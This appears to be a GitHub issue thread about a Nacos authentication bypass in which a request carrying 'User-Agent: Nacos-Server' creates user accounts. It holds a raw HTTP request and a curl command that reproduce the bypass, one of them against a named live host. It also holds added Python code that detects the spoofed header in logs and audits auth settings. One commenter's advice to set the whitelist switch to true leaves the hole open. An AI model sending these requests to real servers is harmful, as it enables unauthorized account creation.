
NacosAuthBypassVulnDetector still unfixed in the latest version? Or was the fix never carried forward into the new version? #7103

Closed
shen771 opened this issue Oct 20, 2021 · 6 comments
Labels
status/invalid This doesn't seem right

Comments


shen771 commented Oct 20, 2021

Describe the bug
NacosAuthBypassVulnDetector still unfixed in the latest version? Or was the fix never carried forward into the new version?

Expected behavior
NacosAuthBypassVulnDetector: the tag changelog says this was fixed in version 1.41, but I downloaded and tested the 1.41 tag and the 2.03 tag myself, and in practice an arbitrary login account can still be added

-[#4701] Fix bypass authentication(identity) problem.
#4701

version: nacos 1.41 tag package and 2.03 tag package
request:
POST /nacos/v1/auth/users?username=1234578&password=123457 HTTP/1.1
Host: xmagnet-nacos.tuhu.cn
User-Agent: Nacos-Server
Content-Length: 0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip
Accept-Language: zh-CN,zh;q=0.9
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Upgrade-Insecure-Requests: 1

response:

{"code":200,"message":"create user ok!","data":null}

Is this not fixed, or was the fix not carried forward into this version?
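The report above shows the shape of the request at issue: a call to the user-management API whose only "credential" is the `User-Agent: Nacos-Server` header that the server-to-server whitelist trusts. From a monitoring standpoint, the useful signal is that header arriving from an address that is not one of the cluster's own peers, and especially a successful response on an `/nacos/v1/auth/` path. The following is an added detection example (not code from the Nacos project or from anyone in this thread). It runs over a few constructed access-log lines in a combined-log-like layout; Nacos does not write this exact format, so `LOG_RE` and the `CLUSTER_MEMBERS` set are assumptions to adapt to the proxy or server in front of your deployment.

```python
import re
from urllib.parse import urlsplit

# Constructed sample access-log lines in a combined-log-like layout. This is NOT
# Nacos's own log format; adapt LOG_RE to whatever your reverse proxy writes.
SAMPLE_LOG = """\
10.0.0.11 - - [20/Oct/2021:15:53:07 +0800] "POST /nacos/v1/auth/users?username=1234578&password=123457 HTTP/1.1" 200 52 "-" "Nacos-Server"
10.0.0.12 - - [20/Oct/2021:15:53:08 +0800] "GET /nacos/v1/ns/instance/list?serviceName=demo HTTP/1.1" 200 310 "-" "Nacos-Server"
10.0.0.13 - - [20/Oct/2021:15:53:09 +0800] "GET /nacos/v1/auth/users?pageNo=1&pageSize=9 HTTP/1.1" 403 88 "-" "Nacos-Server"
10.0.0.14 - - [20/Oct/2021:15:53:10 +0800] "POST /nacos/v1/auth/users HTTP/1.1" 200 52 "-" "Mozilla/5.0"
10.0.0.15 - - [20/Oct/2021:15:53:11 +0800] "GET /nacos/v1/cs/configs?dataId=app&group=DEFAULT_GROUP HTTP/1.1" 200 120 "-" "Nacos-Server"
"""

# Constructed: the addresses of the genuine Nacos cluster peers (what cluster.conf lists).
CLUSTER_MEMBERS = {"10.0.0.12"}

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"$'
)


def parse_line(line):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    rec["path"] = urlsplit(rec["path"]).path  # drop the query string for matching
    return rec


def find_server_ua_from_outsiders(log_text, members=CLUSTER_MEMBERS):
    """Flag requests that present the server-to-server User-Agent from a non-peer address.

    Severity is "high" when such a request reached an /nacos/v1/auth/ endpoint and
    was not rejected (status < 400); every other outsider use of the header is "medium",
    because the whitelist applies to all APIs, not only user management.
    """
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or rec["ua"].lower() != "nacos-server":
            continue
        if rec["ip"] in members:
            continue  # a real cluster peer is expected to send this User-Agent
        on_auth_api = rec["path"].startswith("/nacos/v1/auth/")
        severity = "high" if on_auth_api and rec["status"] < 400 else "medium"
        findings.append({
            "ip": rec["ip"],
            "time": rec["ts"],
            "request": f'{rec["method"]} {rec["path"]}',
            "status": rec["status"],
            "severity": severity,
        })
    return findings


if __name__ == "__main__":
    for f in find_server_ua_from_outsiders(SAMPLE_LOG):
        print(f'[{f["severity"]}] {f["ip"]} {f["request"]} -> {f["status"]} at {f["time"]}')
```

The rule deliberately ignores the browser-agent POST on line four: a legitimate administrator creating a user through the console looks the same in an access log, and that case is better judged by the auth service's own audit trail than by the User-Agent.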

@fangzhengjin

On my side, with authentication enabled, I don't have this problem; it directly returns

{
  "error": "Forbidden",
  "message": "unknown user!",
  "path": "/nacos/v1/auth/users",
  "status": 403,
  "timestamp": "2021-10-20T15:53:07.809+08:00"
}

@javaalpha

http://console.nacos.io/nacos/v1/auth/users?pageNo=1&pageSize=9 The official demo console has this vulnerability too; waiting for the version with the fix

@realJackSun realJackSun added this to the 2.1.0 milestone Oct 22, 2021
@realJackSun realJackSun added contribution welcome kind/discussion Category issues related to discussion and removed contribution welcome labels Oct 22, 2021

myoss commented Oct 26, 2021

nacos-server: 2.0.3, post add user success, is this correct?

curl --location --request POST 'http://nacos.example.com/nacos/v1/auth/users' \
--header 'User-Agent: Nacos-Server' \
--header 'Content-Type: application/x-www-form-urlencoded' \
--data-urlencode 'username=testqwe' \
--data-urlencode 'password=testa'

@lc76226zq

On my side, running in Docker with authentication enabled, I don't have this problem either
[root@k8s-master01 ~]# curl http://172.16.16.30:8848/nacos/v1/auth/users?username=1234578&password=123457
[1] 5941
[root@k8s-master01 ~]# {"timestamp":"2021-11-22T10:45:41.579+08:00","status":403,"error":"Forbidden","message":"unknown user!","path":"/nacos/v1/auth/users"}

NACOS_AUTH_ENABLE=true
For example, a container with authentication enabled can be started with the following command:

docker run --env PREFER_HOST_MODE=hostname --env MODE=standalone --env NACOS_AUTH_ENABLE=true -p 8848:8848 nacos/nacos-server

@NagaResst

Change these in the configuration file:
nacos.core.auth.enabled=true
nacos.core.auth.enable.userAgentAuthWhite=true
Restart after changing and try again; the defaults are the opposite
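Since the thread comes down to two `application.properties` keys, here is an added configuration-audit example (my own code, not the Nacos project's and not from any commenter). It parses a properties file and reports the combinations that leave the user API open: authentication off, or the `nacos.core.auth.enable.userAgentAuthWhite` switch set to `true`, which is the setting that keeps the `User-Agent: Nacos-Server` whitelist active. The identity keys `nacos.core.auth.server.identity.key` / `.value` are the peer-authentication mechanism that replaces the whitelist in the releases that ship them; their presence is taken from later Nacos `application.properties` files and is an assumption to verify against your version. The sample property texts are constructed.

```python
# Constructed sample: the combination the original report exhibits.
WEAK_PROPERTIES = """\
### If turn on auth system:
nacos.core.auth.enabled=false
nacos.core.auth.enable.userAgentAuthWhite=true
"""

# Constructed sample: auth on, User-Agent whitelist off, peers identified by a shared secret.
HARDENED_PROPERTIES = """\
nacos.core.auth.enabled=true
nacos.core.auth.enable.userAgentAuthWhite=false
nacos.core.auth.server.identity.key=serverIdentity
nacos.core.auth.server.identity.value=CHANGE-ME-to-a-long-random-value
"""


def parse_properties(text):
    """Minimal Java .properties reader: '#'/'!' comments, first '=' or ':' splits key/value."""
    props = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(("#", "!")):
            continue
        for sep in ("=", ":"):
            if sep in line:
                key, value = line.split(sep, 1)
                props[key.strip()] = value.strip()
                break
    return props


def audit_nacos_auth(props):
    """Return (severity, message) findings for the auth-related keys discussed in the thread."""
    findings = []
    auth_on = props.get("nacos.core.auth.enabled", "false").lower() == "true"
    ua_white = props.get("nacos.core.auth.enable.userAgentAuthWhite")
    identity_set = bool(props.get("nacos.core.auth.server.identity.key")
                        and props.get("nacos.core.auth.server.identity.value"))

    if not auth_on:
        findings.append(("high", "nacos.core.auth.enabled is not true: every API, "
                                 "including /nacos/v1/auth/users, accepts unauthenticated calls"))

    if ua_white is None:
        # Do not guess the default: it has differed between Nacos releases.
        findings.append(("medium", "nacos.core.auth.enable.userAgentAuthWhite is not set explicitly; "
                                   "the effective default depends on the Nacos version, set it to false"))
    elif ua_white.lower() == "true":
        findings.append(("high", "nacos.core.auth.enable.userAgentAuthWhite=true: any request carrying "
                                 "'User-Agent: Nacos-Server' skips authentication"))

    whitelist_off = ua_white is None or ua_white.lower() != "true"
    if auth_on and whitelist_off and not identity_set:
        findings.append(("medium", "nacos.core.auth.server.identity.key/value are not both set: "
                                   "with the User-Agent whitelist off, cluster peers need them to talk to each other"))
    return findings


if __name__ == "__main__":
    for label, text in (("weak", WEAK_PROPERTIES), ("hardened", HARDENED_PROPERTIES)):
        print(f"== {label} ==")
        for severity, message in audit_nacos_auth(parse_properties(text)) or [("ok", "no findings")]:
            print(f"[{severity}] {message}")
```

Run it against the `application.properties` of the exact tag you deployed, not the one in your repository checkout: the report in this thread and the replies that could not reproduce it differ precisely in what the running server had loaded.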

@realJackSun realJackSun modified the milestones: 2.0.4, 2.1.0 Jan 14, 2022
@KomachiSion KomachiSion removed this from the 2.1.0 milestone Mar 31, 2022
@KomachiSion KomachiSion added status/invalid This doesn't seem right and removed kind/discussion Category issues related to discussion labels Mar 31, 2022

ghjx commented Sep 17, 2024

@threedr3am I downloaded and tested the 1.41 tag and the 2.03 tag; in practice an arbitrary login account can still be added

-[ https://github.com//issues/4701 ] Fix bypass authentication (identity) problem.
